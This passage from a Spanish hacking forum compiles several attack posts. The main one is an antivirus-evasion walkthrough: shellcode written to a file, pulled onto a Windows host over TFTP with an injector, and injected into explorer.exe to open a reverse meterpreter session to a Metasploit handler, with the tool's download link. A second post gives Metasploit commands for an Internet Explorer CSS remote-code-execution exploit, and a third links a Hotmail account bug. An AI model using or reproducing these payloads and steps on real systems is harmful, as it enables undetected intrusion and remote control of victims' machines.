shellcode=("\x29\xc9\xbd\x63\x4e\x7c\x5e\xb1\x5e\xd9\xf7\xd9\x74\x24\xf4\x58\x31\x68\x0e\x03\x68\x0e\x83\xa3\x4a\x9e\xab\x9b\x39\xce\x70\xf5\x67\x37\x53\xc0\x41\xbc\x80\x26\x2a\x8c\x9e\xf7\x8e\xfd\xa3\x1c\xec\x01\xe7\x87\x7f\xd7\x71\x5f\x4b\x13\x6d\x5c\xae\x56\x99\x08\xbe\x6f\xfa\xf1\x81\x63\xaf\x71\x2a\x56\x8f\xff\x05\xdd\x64\x02\x3d\x0b\x12\x38\xae\x18\xef\x06\x6d\xff\x98\x1c\x82\x04\x68\x96\x9d\xb5\x80\x25\xd6\x17\x91\xd4\xdf\xe9\x82\x4f\xf1\xa0\x7a\x64\x44\x26\x18\x80\xe8\x00\x41\xaa\xc3\xf5\x0e\xbc\x7f\x0f\x30\xd6\x93\x91\x29\xd4\x13\xc8\x93\x5c\x0c\x2d\x28\x08\xca\x28\x1e\x1a\x39\x8f\xe4\xd9\xd1\xa6\x52\xeb\x00\x63\x67\x3f\x59\x57\x97\xd3\xb1\x13\x14\x53\x08\xcb\x24\x5a\xc8\xc0\xe4\xb8\x1b\x6f\x5b\xdd\xe1\x7b\xa8\x09\xdb\x06\x31\x24\xd0\xbf\x2f\x25\xf2\x4c\x49\xb4\x8b\x0a\x00\xc4\xcd\x74\x38\xbd\x14\x8c\xb4\xed\xcf\x2f\xb8\x01\x16\x31\xf1\xd0\x90\xd8\xfd\x33\x6a\xbf\xea\xaa\x46\xdd\x12\xa5\x13\x3b\x49\x53\x48\x2a\x28\x6b\x0b\x3b\x57\x7e\x84\x13\xf8\x7e\xd6\xcb\x83\x71\x4f\x55\xe8\x22\xb6\x07\x22\x9f\x8d\xc3\x5e\xd8\x6b\x89\x0e\x12\xe4\xc4\x6e\x8c\x32\x76\x24\x64\xd3\x5c\xbf\xd0\xbc\xab\x3c\x9b\xa2\xb9\xf9\xd8\x6d\x5e\x72\x94\x10\xa9\x58\xfe\xc0\x45\xb9\x53\x99\xa2\xff\x8c\x24\xf8\xc4\xab\x53\x96\x5b\xad\xf2\x29\xdd\x1e\x8f\x73\xad\x66\x84\x84\xb1\xd3\xc9\xe0\xba\x40\x6f\xa5\x17\xda\x1f\xa4\x35\x95\x46\x96\xf6\x9c\xfe\x92\xc0\xcc\xab\x42\x56\x8a\x1c\x79\x4e\xc3\x41\xf8\x83\xc8\x3a\x33\x42\x7d\xa9\xa8\xa2\xfd\x28\x8d\xd6\x9f\x41\x90\x33\x0c\xf6\xc2\x18\x23\x6f\x40\x48\xd6\x30\x30\x47\xc4\x8f\xb5\x22\xe0\x36\x98\xb0\xe5\xbc\x12\x2e\x3f\xf6\x5f\xc2\x49\x62\x2d\x52\xef\xaa\x84\x88")

buffer=shellcode

file=open("pgeneric.txt","w")

file.write(buffer)

Y lo ejecutamos:

Código (bash) [Seleccionar] Expandir

Free-Box:/tmp$ python generic.py

Nuestra shell se pasa a llamar pgeneric.txt y si la abren van a ver todo alfanumérico.
Ok ya tenemos nuestra shell vamos a subirla, en mi caso supongamos que estamos en un backtrack, ási que subimos el TFPT server y le damos el siguiente comando a la shell que tenemos abierta:

Código (dos) [Seleccionar] Expandir

C:\WINDOWS\system32> tftp -i 192.168.1.101 GET pgeneric.txt

Para que vean que el antivirus está actualizado:


La escaneo con el antivirus y:


ok ya tenemos nuestra shell, ahora subimos el Injector

Código (dos) [Seleccionar] Expandir

C:\WINDOWS\system32> tftp -i 192.168.1.101 GET injector.exe

Lo escaneamos y:




bueno nada es detectado así que seteamos un handler de metasploit para que reciba nuestro reverse meterpreter

Código (bash) [Seleccionar] Expandir

msf > [b]use multi/handler[/b]
msf exploit(handler) > [b]set payload windows/meterpreter/reverse_tcp[/b]
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > [b]show options
[/b]
Module options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, none, process
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > [b]set lhost 192.168.1.101[/b]
lhost => 192.168.1.101
msf exploit(handler) > [b]exploit [/b]               

[*] Started reverse handler on 192.168.1.101:4444
[*] Starting the payload handler...

hacemos un tasklist para buscar un pid de proceso, en este caso yo voy a usar el explorer que es el 180 y ejecutamos lo siguiente

Código (dos) [Seleccionar] Expandir

C:\WINDOWS\system32> cd..
C:\WINDOWS> cd ..
C:\> cd Documents and Settings
C:\Documents and Settings> cd Administrator
C:\Documents and Settings\Administrator>cd Desktop
C:\Documents and Settings\Administrator\Desktop>injector pgeneric.txt 180
[*] Author: DouBle_Zer0
[*] HACKERS GARAGE Production
[*] Visit Us: http://www.garage4hackers.com

C:\Documents and Settings\Administrator\Desktop>

y del lado del handler tenemos

Código (bash) [Seleccionar] Expandir

msf exploit(handler) > exploit               

[*] Started reverse handler on 192.168.1.101:4444
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 192.168.1.106
[*] Meterpreter session 4 opened (192.168.1.101:4444 -> 192.168.1.106:1065) at Fri Dec 24 10:12:21 -0300 2010

meterpreter > pwd
C:\Documents and Settings\Administrator
meterpreter > getuid
Server username: XP_FDCC\Renamed_Admin

y el antivirus ni enterado de nada.

link de descarga: :http://www.4shared.com/file/hhHntIlE/injector.html

bueno gente espero que les haya gustado, que tengan felices fiestas y que papa noel les traiga muchos root passwords para todos,jejeje.hasta la próxima.

Visto en: :http://rusopro.diosdelared.com/?coment=9096

[[0 Day] RCE en Internet Explorer 6, 7 y 8]

[0 Day] RCE en Internet Explorer 6, 7 y 8

INFORMACIÓN
Microsoft publicó un boletín informando de una vulnerabilidad (CVE-2010-3962) que afecta a varias de las versiones soportadas de su navegador Internet Explorer 6, 7 y 8; la cual están investigando y por el momento no tiene un parche de solución.

El principal impacto que puede generar esta vulnerabilidad es la ejecución remota de código (RCE -Remote Code Execution-).

El boletín de Microsoft provee soluciones provisionales para evitar la amenaza, las cuales son:

• Evitar el estilo CSS del sitio usando estilos CSS definidos por el usuario
• Utilizar el kit de herramientas EMET
• Utilizar la protección DEP para IE 7
• Leer correos en modo texto
• Fijar las zonas de Intranet e Internet en modo de seguridad "Alto" para bloquear los controles ActiveX y el Active Scripting en esas zonas.

También se informa que el Internet Explorer 9 (Beta) no es afectado y se puede usar sin problemas. En el caso de Internet Explorer 8 en su instalación con valores por defecto es poco probable que sea afectado ya que ofrece la protección DEP.




El módulo explota una vulnerabilidad de corrupción de memoria en el motor HTML de Microsoft (MSHTML). Al analizar una página HTML que contiene una etiqueta especialmente diseñada en CSS provoca la corrupción de memoria lo que conlleva a la ejecución de código arbitrario.

Exploit

Código (ruby) [Seleccionar] Expandir

use exploit/windows/browser/ms10_xxx_ie_css_clip

Payload

Código (ruby) [Seleccionar] Expandir

set PAYLOAD windows/meterpreter/reverse_tcp

Comandos del Metasploit

Código (ruby) [Seleccionar] Expandir

use exploit/windows/browser/ms10_xxx_ie_css_ clip
set SRVHOST IP
set payload windows/meterpreter/reverse_tcp
set LHOST IP
exploit

Video
Debido a algunos problemas con mis máquinas virtuales, opté por poner un vídeo de un tercero.

[youtube=425,350]http://www.youtube.com/watch?v=xbIxkltlP1I[/youtube]

Visto en: :http://daw-labs.com/rce-en-internet-explorer-6-7-y-8/

["El bug del correo alternativo"]

El bug del correo alternativo
HOTMAIL

Viendo blogs de mis amigos, no recordaba qué días atrás había visto algo muy llamativo con el nombre de "El bug del correo alternativo", y hoy se me dio por probarlo y con resultados muy buenos. Vamos a ver de que se trata:

http://shellrootsecurity.blogspot.com/2010/12/el-bug-del-correo-alternativo-hotmail.html